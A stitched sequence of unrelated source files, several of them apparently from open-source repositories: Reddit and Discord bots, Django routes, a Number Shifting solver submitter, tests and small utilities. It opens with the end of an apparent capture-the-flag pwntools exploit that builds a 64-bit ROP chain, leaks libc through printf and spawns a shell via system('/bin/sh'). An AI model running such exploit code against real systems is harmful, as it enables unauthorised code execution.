log.success('='*100)
##########################下面为攻击代码#######################
##########################下面为攻击代码#######################
main_addr = io_elf.sym['main']
printf_plt_addr = io_elf.plt['printf']
libc_start_main_got = io_elf.got['__libc_start_main']
pop_rdi_ret = 0x400733
pop_rsi_r15 = 0x400731
# 64位下需要一个格式化字符串来泄露,与32位不一样!!
# 64位下的ROP可能还需要维持栈平衡,用ret指令!!!
format_str_addr = 0x400770
ret_addr = 0x4004d1
LOG_ADDR_SUCCESS('main_addr', main_addr)
LOG_ADDR_SUCCESS('printf_plt_addr', printf_plt_addr)
LOG_ADDR_SUCCESS('libc_start_main_got', libc_start_main_got)
#
io.recvuntil("What's your name? ")
# 利用printf泄露基地址
payload = (0x20 + 8) * b'a'
payload += p64(pop_rdi_ret) + p64(format_str_addr) + p64(pop_rsi_r15) + p64(libc_start_main_got) + p64(0) + p64(printf_plt_addr) +p64(ret_addr) + p64(main_addr)
io.sendline(payload)
message = io.recv()
index = message.index(b'\x7f')
libc_start_main_addr = message[index - 5: index + 1]
libc_start_main_addr = u64(libc_start_main_addr.ljust(8, b'\x00'))
libc = LibcSearcher('__libc_start_main', libc_start_main_addr)
libc_base_addr = libc_start_main_addr - libc.dump('__libc_start_main')
system_addr = libc_base_addr + libc.dump('system')
str_bin_sh = libc_base_addr + libc.dump('str_bin_sh')
LOG_ADDR_SUCCESS('libc_start_main_addr', libc_start_main_addr)
LOG_ADDR_SUCCESS('libc_base_addr', libc_base_addr)
LOG_ADDR_SUCCESS('sytem_addr', system_addr)
LOG_ADDR_SUCCESS('str_bin_sh', str_bin_sh)
# io.recv()
payload = (0x20 + 8) * b'a'
payload += p64(pop_rdi_ret) + p64(str_bin_sh) + p64(system_addr) + p64(ret_addr) + p64(main_addr)
io.sendline(payload)
# io.recvuntil('bytes of data!\n')
io.interactive() | 2.109375 | 2 |
API/v1/leaks/__init__.py | FortniteFevers/peely-api | 5 | 12766826 | import io
import json
import math
import random
import time
import traceback
from datetime import datetime
import aiofiles
import discord
import sanic
import sanic.response
from PIL import Image
from discord.ext import commands
from modules import leaks
async def handler(req):
return sanic.response.json(json.loads(await (await aiofiles.open(f'Cache/data/resp_leaks.json', mode='r')).read()))
async def generateleaks(data: dict, client: commands.Bot):
await (await aiofiles.open('Cache/data/leaks.json', mode='w+')).write(
json.dumps(data, indent=2))
start = time.time()
files = [await leaks.GenerateCard(i) for i in data["data"]["items"]]
if not files:
raise FileNotFoundError("No Images")
await client.get_channel(735018804169670687).send(f"New Leaks detected")
result = Image.new("RGBA", (
round(math.sqrt(len(files)) + 0.45) * 305 - 5, round(math.sqrt(len(files))) * 550 - 5))
result.paste(Image.open("assets/Images/Backgrounds/Background.png").resize(
(
int(round(math.sqrt(len(files)) + 0.45) * 305 - 5),
int(round(math.sqrt(len(files)) + 0.45) * 550 - 5)),
Image.ANTIALIAS))
x = -305
y = 0
count = 0
for img in files:
try:
img.thumbnail((305, 550), Image.ANTIALIAS)
w, h = img.size
if count >= round(math.sqrt(len(files)) + 0.45):
y += 550
x = -305
count = 0
x += 305
count += 1
result.paste(img, (x, y, x + w, y + h))
except:
continue
result.save("cdn/current/leaks.png", optimized=True)
uniqueimage = str(time.time())
result.save(f"cdn/unique/leaks_{uniqueimage}.png", optimize=True)
buffered = io.BytesIO()
result.save(buffered, format="PNG")
buffered.seek(0)
data = {
"url": "https://api.peely.de/cdn/current/leaks.png",
"uniqueurl": f"https://api.peely.de/cdn/unique/leaks_{uniqueimage}.png",
"time": str(datetime.utcnow().__format__('%A, %B %d, %Y'))
}
await (await aiofiles.open('Cache/data/resp_leaks.json', mode='w+')).write(
json.dumps(data, indent=2))
await client.get_channel(735018804169670687).send(
f"Updated Leaks. Generating Image in {round(time.time() - start, 2)}sec")
| 2.359375 | 2 |
tests/test_bad_sys_use.py | timgates42/dlint | 0 | 12766827 | #!/usr/bin/env python
from __future__ import (
absolute_import,
division,
print_function,
unicode_literals,
)
import unittest
import dlint
class TestBadSysUse(dlint.test.base.BaseTest):
def test_bad_sys_usage(self):
python_string = self.get_ast_node(
"""
import sys
sys.call_tracing(lambda: 42, ())
sys.setprofile(lambda: 42)
sys.settrace(lambda: 42)
"""
)
linter = dlint.linters.BadSysUseLinter()
linter.visit(python_string)
result = linter.get_results()
expected = [
dlint.linters.base.Flake8Result(
lineno=4,
col_offset=0,
message=dlint.linters.BadSysUseLinter._error_tmpl
),
dlint.linters.base.Flake8Result(
lineno=5,
col_offset=0,
message=dlint.linters.BadSysUseLinter._error_tmpl
),
dlint.linters.base.Flake8Result(
lineno=6,
col_offset=0,
message=dlint.linters.BadSysUseLinter._error_tmpl
),
]
assert result == expected
if __name__ == "__main__":
unittest.main()
| 2.328125 | 2 |
lsf/esub.py | mcopik/python-lsf | 12 | 12766828 | #!/usr/bin/env python
"""Wrapper script with bsub functionality."""
from __future__ import print_function
import sys
import os
import shlex
import argparse
from submitjob import submitjob
from utility import color
def esub(args, bsubargs, jobscript):
"""Wrapper script with bsub functionality."""
data = {"command": ""}
scriptargs = []
for line in jobscript.splitlines(True):
if line.startswith("#!"):
data["command"] += line
elif line.startswith("#BSUB "):
scriptargs += shlex.split(line[6:].split("#")[0])
else:
data["command"] += line.split("#")[0]
bsubargs = scriptargs + bsubargs
last = False
cmd = False
for arg in bsubargs:
if cmd:
data["command"] += " " + arg
continue
if arg[0] == "-":
if last:
data[last] = True
last = arg
else:
if last:
data[last] = arg
last = False
else:
cmd = True
data["command"] = arg
if last:
data[last] = True
try:
jobid = submitjob(data)
print(jobid)
except Exception as e:
print(color(e.strerror, "r"))
sys.exit(-1)
def main():
"""Main program entry point."""
parser = argparse.ArgumentParser(
description="Wrapper for bsub."
)
parser.add_argument_group("further arguments",
description="are passed to bsub")
args, bsubargs = parser.parse_known_args()
jobscript = sys.stdin.read()
try:
esub(args, bsubargs, jobscript)
except KeyboardInterrupt:
pass
if __name__ == "__main__":
main()
| 3.078125 | 3 |
snippets/findtag.py | chengdagong/kdplus | 0 | 12766829 | from pykd import *
from sys import argv
nt = module("nt")
LDR_DATA_TABLE_ENTRY = nt.type("_LDR_DATA_TABLE_ENTRY")
def getModuleList():
ldrLst = typedVarList( nt.PsLoadedModuleList, LDR_DATA_TABLE_ENTRY, "InLoadOrderLinks.Flink")
return [ module(m.DllBase) for m in ldrLst ]
def findTagInModule(mod, tag):
matchLst = []
begin = mod.begin()
end = mod.end()
offset = begin
size = mod.size()
while True:
match = searchMemory( offset, size, tag )
if not match:
break;
matchLst.append(match)
offset = match + 1
size = end - offset
return matchLst
def main():
if len(argv) < 2:
print "You should note tag's value"
return
if len(argv[1])!=4:
print "Tag must have 4 symbols length"
return
tag = str(argv[1])
modLst = getModuleList()
for m in modLst:
matchLst = findTagInModule( m, tag )
if len(matchLst) == 0:
#print m.name(), "tag not found"
pass
else:
print m.name(), "found", len(matchLst), "entries"
for offset in matchLst:
print "\t", hex(offset)
if __name__=="__main__":
main()
| 2.515625 | 3 |
or_suite/envs/general_test.py | JasmineSamadi/ORSuite | 4 | 12766830 | <reponame>JasmineSamadi/ORSuite
import gym
import numpy as np
import sys
from scipy.stats import poisson
import env_configs
import pytest
from stable_baselines3.common.env_checker import check_env
import general_test_helpers
def test_ambulance_metric():
general_test_helpers.test_env(
'Ambulance-v0', env_configs.ambulance_metric_default_config)
def test_ambulance_graph():
general_test_helpers.test_env(
'Ambulance-v1', env_configs.ambulance_graph_default_config)
def test_resource():
general_test_helpers.test_env(
'Resource-v0', env_configs.resource_allocation_default_config)
def test_bandit():
general_test_helpers.test_env(
'Bandit-v0', env_configs.finite_bandit_default_config)
def test_vaccine():
general_test_helpers.test_env(
'Vaccine-v0', env_configs.vaccine_default_config1)
def test_rideshare():
general_test_helpers.test_env(
'Rideshare-v0', env_configs.rideshare_graph_default_config)
def test_oil():
general_test_helpers.test_env(
'Oil-v0', env_configs.oil_environment_default_config)
| 1.75 | 2 |
code/arc101_a_01.py | KoyanagiHitoshi/AtCoder | 3 | 12766831 | <gh_stars>1-10
n,k=map(int,input().split())
x=sorted(list(map(int,input().split())))
a=[]
for i in range(n-k+1):
l=x[i]
r=x[i+k-1]
a.append(min(abs(l)+abs(r-l),abs(r)+abs(l-r)))
print(min(a)) | 2.296875 | 2 |
isup.py | chpwssn/isitupbot | 1 | 12766832 | from specifics import *
import urllib
import urllib2
import json
import praw
import time
urltocheck = "b-15.net http://google.com http://172.16.17.32 https://172.16.17.32"
def runcheck(url):
serverstried = 0
httpup = 0
dnsresolve = 0
serverconnected = 0
serverids = ""
servercities = ""
resolvedto = ""
for server in servers:
serverstried += 1
try:
data = {"url": url,"api":apikey}
data = urllib.urlencode(data)
request = urllib2.Request(server + '?' + data)
response = urllib2.urlopen(request)
page = response.read()
j = json.loads(page)
print j
if j:
servercities += " "+j['city']+", "+j['country']+"."
serverids += "^"+str(j['serverid'])+" "
serverconnected += 1
if j['http'] == 200:
httpup += 1
if j['resolved'] == True:
if str(j['dns']) not in resolvedto:
resolvedto += str(j['dns'])+" "
dnsresolve += 1
except:
pass
serverstried = str(serverstried)
serverconnected = str(serverconnected)
dnsresolve = str(dnsresolve)
httpup = str(httpup)
response = ""
response += "Hello! I\'m the IsItUpBot!\n\nResults for **"+url+"**:"
response +="\n\nOf the "+serverstried+" servers tried, I connected to "+serverconnected+". They were located in: "+servercities
response += "\n\n"+dnsresolve+"/"+serverconnected+" servers indicated "+url+" resolved with DNS: "+resolvedto
response += "\n\n"+httpup+"/"+serverconnected+" servers indicated "+url+" is up."
response += "\n\n"+footerGen(mention.permalink)+" ^| ^I ^contacted ^servers: "+serverids
return response
def footerGen(permalink):
return '[^report ^a ^mistake](http://www.reddit.com/message/compose/?to=chpwssn&subject=IsItUpBot%20Error%20Report&message='+permalink+') ^| [^more ^info](http://www.reddit.com/r/IsItUpBot/wiki/index)'
r = praw.Reddit('IsItUpBot v1.5 by /u/chpwssn. This bot, when summoned, will attempt to connect to the domains/IPs listed in the comment. Useful for seeing if a site is down for everyone or just you.')
r.login(botuser,botpass)
#Open the file used to keep track of the mentions we've already scanned for words
with open("isitupbotscanned.txt") as scannedfile:
scanned = scannedfile.read().splitlines()
print scanned
done_this_time = set()
loop = True
loops = 0
while loop:
loops += 1
if loops%100 == 0:
print "Done "+str(loops)+" loops, completed: "+str(done_this_time)
#Get the username mentions we have in our inbox
mentions = r.get_mentions()
for mention in mentions:
#If we haven't scanned the mention yet previously or in this time running the script
if mention.id not in scanned and mention.id not in done_this_time:
#Record the mention as scanned in the file and the set
with open("isitupbotscanned.txt", "a") as scannedfile:
scannedfile.write(mention.id+'\n')
done_this_time.add(mention.id)
print mention
print mention.id
words = mention.body.split()
for word in words:
if word.lower() != "/u/isitupbot":
mention.reply(runcheck(word))
time.sleep(2) | 3.09375 | 3 |
python/life/cell.py | PJSoftware/game-of-life | 0 | 12766833 | class Cell:
def __init__(self, alive = False):
self.currentState = alive
self.futureState = alive
def updateState(self, state):
self.futureState = state
def refresh(self):
self.currentState = self.futureState
def isAlive(self):
return self.currentState
def __str__(self):
return "O" if self.currentState else "."
| 3.171875 | 3 |
tpDcc/tools/renamer/plugins/letter.py | tpRigToolkit/tpRigToolkit-tools-renamer | 3 | 12766834 | <gh_stars>1-10
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Module that contains letter renamer plugin implementation
"""
from __future__ import print_function, division, absolute_import
from Qt.QtCore import QObject
from Qt.QtWidgets import QWidget
from tpDcc.managers import resources
from tpDcc.libs.qt.widgets import layouts, buttons, label, switch
from tpDcc.tools.renamer.core import plugin
class LetterRenamerPlugin(plugin.RenamerPlugin):
VERSION = '0.0.1'
ID = 'letter'
PLUGIN_HEIGHT = 130
def __init__(self, model, controller, parent=None):
super(LetterRenamerPlugin, self).__init__(model=model, controller=controller, parent=parent)
@classmethod
def create(cls, parent):
model = LetterRenamerPluginModel()
controller = LetterRenamerPluginController(model=model)
return cls(model=model, controller=controller, parent=parent)
@classmethod
def get_title(cls):
return 'Letter'
@classmethod
def get_icon(cls):
return resources.icon('letter')
def get_custom_widget(self):
widget = QWidget(parent=self)
widget_layout = layouts.VerticalLayout(spacing=0, margins=(2, 2, 2, 2))
widget.setLayout(widget_layout)
letters_layout = layouts.GridLayout(spacing=2, margins=(0, 0, 0, 0))
i = 0
j = 0
for letter in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
if i % 14 == 0:
j += i
i = 0
letter_button = buttons.StyleBaseButton(letter, button_style=buttons.ButtonStyles.FlatStyle, parent=self)
letter_button.setCheckable(True)
letters_layout.addWidget(letter_button, j, i)
if i == 0 and j == 0:
letter_button.setChecked(True)
i += 1
widget_layout.addLayout(letters_layout)
capital_widget = QWidget(parent=self)
capital_layout = layouts.HorizontalLayout()
capital_widget.setLayout(capital_layout)
capital_label = label.BaseLabel('Capital:', parent=self)
self._capital_switch = switch.SwitchWidget(parent=self)
self._capital_switch.setChecked(True)
capital_layout.addStretch()
capital_layout.addWidget(capital_label)
capital_layout.addWidget(self._capital_switch)
capital_layout.addStretch()
letters_layout.addWidget(capital_widget, j, i+1, 1, 2)
return widget
class LetterRenamerPluginModel(QObject):
def __init__(self):
super(LetterRenamerPluginModel, self).__init__()
class LetterRenamerPluginController(object):
def __init__(self, model):
super(LetterRenamerPluginController, self).__init__()
self._model = model
@property
def model(self):
return self._model
| 2.234375 | 2 |
HackerRank/Problem Solving/Algorithms/Strings/Making Anagrams.py | anubhab-code/Competitive-Programming | 0 | 12766835 | str1 = input()
str2 = input()
a = [0 for i in range(0,27)]
for i in str1:
a[ord(i)-ord('a')] += 1
for i in str2:
a[ord(i)-ord('a')] -= 1
ans = 0
for i in a:
if ( i < 0 ):
ans += -i
else:
ans += i
print(ans) | 3.25 | 3 |
src/solorunner/submit.py | marchete/RN_Explorer | 1 | 12766836 | <reponame>marchete/RN_Explorer
#!/usr/bin/env python3
import sys
import time
import string
import random
import glob
import re
import traceback
import zlib
import base64
program_name=sys.argv[1]
try:
threads=int(sys.argv[2])
except:
threads=2
try:
reset_seconds=int(sys.argv[3])
except:
reset_seconds=39
try:
lFa=int(sys.argv[4])
except:
lFa=3200
try:
K_A=int(sys.argv[5])
except:
K_A=50000
try:
K_B=int(sys.argv[6])
except:
K_B=0
try:
K_C=int(sys.argv[7])
except:
K_C=2000
try:
K_D=int(sys.argv[8])
except:
K_D=40000
try:
INC_TIME=int(sys.argv[9])
except:
INC_TIME=100
try:
INC_LFA=int(sys.argv[10])
except:
INC_LFA=40
try:
RECOMB=int(sys.argv[11])
except:
RECOMB=0
program_execute = './'+program_name+' '+str(threads)+' '+str(reset_seconds)+' '+str(lFa)+' '+str(K_A)+' '+str(K_B)+' '+str(K_C)+' '+str(K_D)+' '+str(INC_TIME)+' '+str(INC_LFA)+' '+str(RECOMB)
import os
import io
import requests
import subprocess
salida = "solution.txt"
#put your email on a text file named cg_email.txt
with open('cg_email.txt', 'r') as f:
email = f.read().strip()
#put your password on a text file named cg_pass.txt
with open('cg_pass.txt', 'r') as f:
password = f.read().strip()
with open('downloader.py', 'r') as f:
codeDL = f.read().strip()
number_level=0
userId=''
handle=''
session = requests.Session()
parameters=''
runningprocess=''
def killProcess():
global runningprocess
global program_name
subprocess.run("killall RN_Explo* >/dev/null 2>&1", shell=True)
if (runningprocess!=""):
subprocess.run("killall "+runningprocess+" >/dev/null 2>&1", shell=True)
if (program_name!=""):
subprocess.run("killall "+program_name+" >/dev/null 2>&1", shell=True)
def recompileCode():
global runningprocess
global program_name
if (runningprocess!=""):
cpp_filename=runningprocess
else:
cpp_filename=program_name
with open(cpp_filename+'.cpp', 'r') as f:
original_content = f.read().strip()
try:
if os.path.exists('level.txt'):
with open('level.txt', 'r') as f:
level = f.read().strip()
subprocess.run('cat level.txt | tr " " "\\n" |tail -n+2| grep -v ^0$ | wc -l > cuentaNUM.txt', shell=True)
ele=level.splitlines()
#******************************* CODE RELOAD *************************************
if (len(ele)>=4):
DIM=ele[0].split()
if (len(DIM)>=2):
W=int(DIM[0])
H=int(DIM[1])
with open('cuentaNUM.txt', 'r') as f:
MAX_NUMBERS = f.read().strip()
if (MAX_NUMBERS!="" and MAX_NUMBERS!="0"):
MAX_NUMBERS=int(MAX_NUMBERS)
print(' -->Recompiling '+cpp_filename+'.cpp with W='+str(W)+' H='+str(H)+' MAX_NUMBERS='+str(MAX_NUMBERS)+" ");
if (MAX_NUMBERS<256):
MAX_NUMBERS=256
new_content=re.sub(r"const\s+int\s+MAX_W\s*=.*;", "const int MAX_W = "+str(W)+";", original_content)
new_content=re.sub(r"const\s+int\s+MAX_H\s*=.*;", "const int MAX_H = "+str(H)+";", new_content)
new_content=re.sub(r"const\s+int\s+MAX_NUMBERS\s*=.*;", "const int MAX_NUMBERS = "+str(MAX_NUMBERS)+";", new_content)
else:
print("Wrong numbers:"+MAX_NUMBERS)
subprocess.run("rm cuentaNUM.txt >/dev/null 2>&1", shell=True)
else:
print('Recompiling '+cpp_filename+'.cpp without changes.... ');
except Exception as error:
print('Error compiling: %s' % error)
if (len(new_content)>50000):
with open(cpp_filename+'.cpp', 'w') as f:
f.write(new_content)
if (new_content!=original_content or not os.path.exists(cpp_filename)):
subprocess.run("./CLANG17.sh "+cpp_filename, shell=True)
else:
print('No need to recompile '+cpp_filename+'');
# for each level of the game
if os.path.exists('runningprocess.txt'):
with open('runningprocess.txt', 'r') as f:
runningprocess = f.read().strip()
while True:
try:
recompileCode()
if os.path.exists('parameters.txt'):
with open('parameters.txt', 'r') as f:
parameters = f.read().strip()
if os.path.exists('runningprocess.txt'):
with open('runningprocess.txt', 'r') as f:
runningprocess = f.read().strip()
if ((runningprocess!='') and (parameters!='')):
program_execute='./'+runningprocess+' '+str(threads)+' '+parameters
if ((runningprocess=='') and (parameters!='')):
program_execute='./'+program_name+' '+str(threads)+' '+parameters
if ((runningprocess!='') and (parameters=='')):
program_execute = './'+runningprocess+' '+str(threads)+' '+str(reset_seconds)+' '+str(lFa)+' '+str(K_A)+' '+str(K_B)+' '+str(K_C)+' '+str(K_D)+' '+str(INC_TIME)+' '+str(INC_LFA)+' '+str(RECOMB)
print("Program execute:"+program_execute)
# run the solver on level.txt and save output to solution.txt
subprocess.run(program_execute + " > "+salida, shell=True)
#with open('solution.txt', "w") as outfile:
# subprocess.run(program_execute, stdout=outfile)
with open('level_password.txt', 'r') as f:
level_pass = f.read().strip()
try:
with open(salida, 'r') as f:
solution = f.read().strip()
except:
pass
if solution == '':
listaSoluciones = glob.glob('SOLUTION_*_'+level_pass+'.txt')
for archivo_sol in listaSoluciones:
print('Found solution file '+archivo_sol)
with open(archivo_sol, 'r') as f:
solution=''
lines=f.readlines()
saltaLinea=True
for line in (lines):
if (not saltaLinea):
solution=solution+line
if (level_pass in line):
saltaLinea=False
break
if solution == '':
print('Empty solution, crashed? Retrying...')
time.sleep(5)
continue
solution = level_pass + '\n' + solution
with open('log.txt', 'a') as f:
f.write('\nsolution:\n')
f.write(solution)
# submit the solution to CodinGame
# login to CodinGame and get submit ID
session = requests.Session()
r = session.post('https://www.codingame.com/services/Codingamer/loginSiteV2', json=[email, password, True])
userId = r.json()['codinGamer']['userId']
r = session.post('https://www.codingame.com/services/Puzzle/generateSessionFromPuzzlePrettyId', json=[userId, "number-shifting", False])
handle = r.json()['handle']
r = session.post('https://www.codingame.com/services/TestSession/play', json=[handle, {'code':solution, 'programmingLanguageId':'PHP', 'multipleLanguages':{'testIndex':1}}])
print('replay: https://www.codingame.com/replay/' + str(r.json()['gameId']))
next_level = ''
if 'gameInformation' in r.json()['frames'][-2]:
next_level = r.json()['frames'][-2]['gameInformation']
if os.path.exists('number_level.txt'):
with open('number_level.txt', 'r') as f:
clls=f.read().strip()
current_number_level=int(clls) if clls.isdigit() else 0
if current_number_level==931:
print('Level 931 solved. WARNING! Level 932+ needs a different level.txt downloader, writting on stderr a compressed text in zip->base64')
break
if not 'Code for next level' in next_level:
next_level=''
try:
next_level=re.findall(r'Code for next level .level [0-9]+.: ([a-z]+)', r.text)[0]
level_password=next_level
except:
pass
if next_level == '':
print('The solution was wrong, watch the replay for details')
time.sleep(30)
continue
else:
next_level = next_level[next_level.find(':')+2:]
level_password = next_level.split('\n')[0]
number_level = int(1 + r.json()['metadata']['Level'])
if (number_level < current_number_level):
print('Error: lower than current levelr?')
number_level=current_number_level+1
with open('level_password.txt', 'w') as f:
f.write(level_password)
with open('number_level.txt', 'w') as f:
f.write(str(number_level))
# get the full level
level_input='\n'.join(next_level.split('\n')[1:])
if (number_level > 258): #fix for CG stderr limitations. TODO: On level 932+ you need a different approach. I went to zip->base64 print to stderr.
r = session.post('https://www.codingame.com/services/TestSession/play', json=[handle, {'code':'#Level:'+str(number_level)+'\r\necho "'+level_password+'";cat >&2', 'programmingLanguageId':'Bash', 'multipleLanguages':{'testIndex':1}}])
level_input = r.json()['frames'][2]['stderr']
if (level_input!='bajaNivel'):
with open('level.txt', 'w') as f:
f.write(level_input + '\n')
# save input for next level
with open('log.txt', 'a') as f:
f.write('\nreplay: https://www.codingame.com/replay/' + str(r.json()['gameId']))
f.write('\n\nLevel ' + str(number_level) + ':\n')
f.write(level_password)
f.write(level_input)
subprocess.run("rm SAFE_*.txt >/dev/null 2>&1", shell=True)
subprocess.run("rm APROX_*.txt >/dev/null 2>&1", shell=True)
subprocess.run("rm EXTERN_*.txt >/dev/null 2>&1", shell=True)
subprocess.run("rm solution.txt >/dev/null 2>&1", shell=True)
killProcess()
except Exception as e:
with open('log.txt', 'a') as f:
f.write("Exception {0}\n".format(str(e))+" "+traceback.format_exc())
session = requests.Session()
time.sleep(10)
| 2.375 | 2 |
information/urls.py | encrypted-fox/students_performance_monitoring | 0 | 12766837 | <reponame>encrypted-fox/students_performance_monitoring
from rest_framework import routers
from .views import *
from . import views
router = routers.DefaultRouter()
router.register('start_years', StartYearsViewSet)
router.register('terms', TermsViewSet)
router.register('marks', MarksViewSet)
router.register('control_types', ControlTypesViewSet)
router.register('list_students_with_more_5', ListStudentsWithMore5, basename="students_with_more_5")
router.register('list_students_with_more_4', ListStudentsWithMore4, basename="students_with_more_4")
router.register('list_students_with_more_3', ListStudentsWithMore3, basename="students_with_more_3")
router.register('list_students_with_more_2', ListStudentsWithMore2, basename="students_with_more_2")
router.register('list_students_with_more_pass', ListStudentsWithMorePass, basename="students_with_more_pass")
router.register('list_students_with_more_not_pass', ListStudentsWithMoreNotPass, basename="students_with_more_not_pass")
router.register('list_students_with_more_not_appointed', ListStudentsWithMoreNotAppointed, basename="students_with_more_not_appointed")
router.register('list_students_only_with_more_then_2', ListStudentsOnlyWithMoreThen2, basename="students_only_with_more_then_2")
router.register('list_students_only_with_more_then_3', ListStudentsOnlyWithMoreThen3, basename="students_only_with_more_then_3")
router.register('list_students_with_less_3', ListStudentsWithLess3, basename="students_with_less_3")
router.register('list_students_with_less_2', ListStudentsWithLess2, basename="students_with_less_2")
router.register('list_students_with_one_5', ListStudentsWithOne5, basename="students_with_one_5")
router.register('list_students_with_one_4', ListStudentsWithOne4, basename="students_with_one_4")
router.register('list_students_with_one_3', ListStudentsWithOne3, basename="students_with_one_3")
router.register('list_students_with_one_2', ListStudentsWithOne2, basename="students_with_one_2")
router.register('list_students_with_one_pass', ListStudentsWithOnePass, basename="students_with_one_pass")
router.register('list_students_with_one_not_pass', ListStudentsWithOneNotPass, basename="students_with_one_not_pass")
router.register('list_students_with_one_not_appointed', ListStudentsWithOneNotAppointed, basename="students_with_one_not_appointed")
router.register('list_students_only_with_5', ListStudentsOnlyWith5, basename="students_only_with_5")
router.register('list_students_only_with_4', ListStudentsOnlyWith4, basename="students_only_with_4")
router.register('list_students_only_with_3', ListStudentsOnlyWith3, basename="students_only_with_3")
router.register('list_students_only_with_2', ListStudentsOnlyWith2, basename="students_only_with_2")
router.register('list_students_only_with_pass', ListStudentsOnlyWithPass, basename="students_only_with_pass")
router.register('list_students_only_with_not_pass', ListStudentsOnlyWithNotPass, basename="students_only_with_not_pass")
router.register('list_students_only_with_not_appointed', ListStudentsOnlyWithNotAppointed, basename="students_only_with_not_appointed")
router.register('list_students_with', ListStudentsWith, basename="students_with")
urlpatterns = router.urls
| 2.03125 | 2 |
check_model_params.py | mlvc-lab/ILKP | 1 | 12766838 | import argparse
import numpy as np
import models
from utils import set_arch_name
model_names = sorted(name for name in models.__dict__
if name.islower() and not name.startswith("__")
and callable(models.__dict__[name]))
def config():
r"""configuration settings
"""
parser = argparse.ArgumentParser(description='Check model parameters')
parser.add_argument('-a', '--arch', metavar='ARCH', default='mobilenet',
choices=model_names,
help='model architecture: ' +
' | '.join(model_names) +
' (default: mobilenet)')
parser.add_argument('--layers', default=16, type=int, metavar='N',
help='number of layers in VGG/ResNet/ResNeXt/WideResNet (default: 16)')
parser.add_argument('--bn', '--batch-norm', dest='bn', action='store_true',
help='Use batch norm in VGG?')
parser.add_argument('--width-mult', default=1.0, type=float, metavar='WM',
help='width multiplier to thin a network '
'uniformly at each layer (default: 1.0)')
# for calculating number of pwkernel slice
parser.add_argument('-pwd', '--pw-bind-size', default=8, type=int, metavar='N',
dest='pw_bind_size',
help='the number of binding channels in pointwise convolution '
'(subvector size) (default: 8)')
cfg = parser.parse_args()
return cfg
def main():
opt = config()
# set model name
arch_name = set_arch_name(opt)
# calculate number of pwkernel slice
# model = models.__dict__[opt.arch](data='cifar10', num_layers=opt.layers,
# width_mult=opt.width_mult, batch_norm=opt.bn)
# w_kernel = model.get_weights_conv(use_cuda=False)
# for i in range(len(w_kernel)):
# print(np.shape(w_kernel[i]))
# w_pwkernel = model.get_weights_pwconv(use_cuda=False)
# d = opt.pw_bind_size
# sum_slices = 0
# sum_num_weights = 0
# for i in range(len(w_pwkernel)):
# c_out, c_in, _, _ = np.shape(w_pwkernel[i])
# num_weights = c_out * c_in
# sum_num_weights += num_weights
# if i == 0:
# num_slice = c_out * (c_in - d + 1)
# else:
# num_slice = c_out * (c_in // d)
# sum_slices += num_slice
# print('[{}-th layer] #weights: {} / #slices: {}'.format(i, num_weights, num_slice))
# print('\ntotal #weights: {} / total #slices (except ref_layer): {}'.format(sum_num_weights, sum_slices))
print('\n[ {}-cifar10 parameters ]'.format(arch_name))
model = models.__dict__[opt.arch](data='cifar10', num_layers=opt.layers,
width_mult=opt.width_mult, batch_norm=opt.bn)
# for name, param in model.named_parameters():
# if name.find('linear') != -1:
# print('{}: {}'.format(name, param.numel()))
# for name, param in model.named_parameters():
# print('{}: {}'.format(name, param.numel()))
num_params = sum(p.numel() for p in model.parameters())
num_trainable_params = sum(p.numel() for p in model.parameters() if p.requires_grad)
print('Number of all parameters: ', num_params)
print('Number of all trainable parameters: ', num_trainable_params)
print('\n[ {}-cifar100 parameters ]'.format(arch_name))
model = models.__dict__[opt.arch](data='cifar100', num_layers=opt.layers,
width_mult=opt.width_mult, batch_norm=opt.bn)
# for name, param in model.named_parameters():
# if name.find('linear') != -1:
# print('{}: {}'.format(name, param.numel()))
# for name, param in model.named_parameters():
# print('{}: {}'.format(name, param.numel()))
num_params = sum(p.numel() for p in model.parameters())
num_trainable_params = sum(p.numel() for p in model.parameters() if p.requires_grad)
print('Number of all parameters: ', num_params)
print('Number of trainable parameters: ', num_trainable_params)
# print('\n[ {}-imagenet parameters ]'.format(arch_name))
# model = models.__dict__[opt.arch](data='imagenet', num_layers=opt.layers,
# width_mult=opt.width_mult, batch_norm=opt.bn)
# for name, param in model.named_parameters():
# if name.find('linear') != -1:
# print('{}: {}'.format(name, param.numel()))
# for name, param in model.named_parameters():
# print('{}: {}'.format(name, param.numel()))
# num_params = sum(p.numel() for p in model.parameters())
# num_trainable_params = sum(p.numel() for p in model.parameters() if p.requires_grad)
# print('Number of all parameters: ', num_params)
# print('Number of trainable parameters: ', num_trainable_params)
if __name__ == '__main__':
main()
| 2.328125 | 2 |
tests/test_circle_ci.py | dhermes/ci-diff-helper | 5 | 12766839 | <filename>tests/test_circle_ci.py<gh_stars>1-10
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
class Test__circle_ci_pr(unittest.TestCase):
@staticmethod
def _call_function_under_test():
from ci_diff_helper import circle_ci
return circle_ci._circle_ci_pr()
def test_success(self):
import mock
from ci_diff_helper import environment_vars as env
valid_int = '331'
actual_val = 331
self.assertEqual(int(valid_int), actual_val)
mock_env = {env.CIRCLE_CI_PR_NUM: valid_int}
with mock.patch('os.environ', new=mock_env):
self.assertEqual(self._call_function_under_test(), actual_val)
def test_failure_unset(self):
import mock
with mock.patch('os.environ', new={}):
self.assertIsNone(self._call_function_under_test())
def test_failure_bad_value(self):
import mock
from ci_diff_helper import environment_vars as env
not_int = 'not-int'
self.assertRaises(ValueError, int, not_int)
mock_env = {env.CIRCLE_CI_PR_NUM: not_int}
with mock.patch('os.environ', new=mock_env):
self.assertIsNone(self._call_function_under_test())
class Test__repo_url(unittest.TestCase):
@staticmethod
def _call_function_under_test():
from ci_diff_helper import circle_ci
return circle_ci._repo_url()
def test_success(self):
import mock
from ci_diff_helper import environment_vars as env
repo_url = 'https://github.com/foo/bar'
mock_env = {env.CIRCLE_CI_REPO_URL: repo_url}
with mock.patch('os.environ', new=mock_env):
result = self._call_function_under_test()
self.assertEqual(result, repo_url)
def test_failure(self):
import mock
with mock.patch('os.environ', new={}):
with self.assertRaises(OSError):
self._call_function_under_test()
class Test__provider_slug(unittest.TestCase):
@staticmethod
def _call_function_under_test(repo_url):
from ci_diff_helper import circle_ci
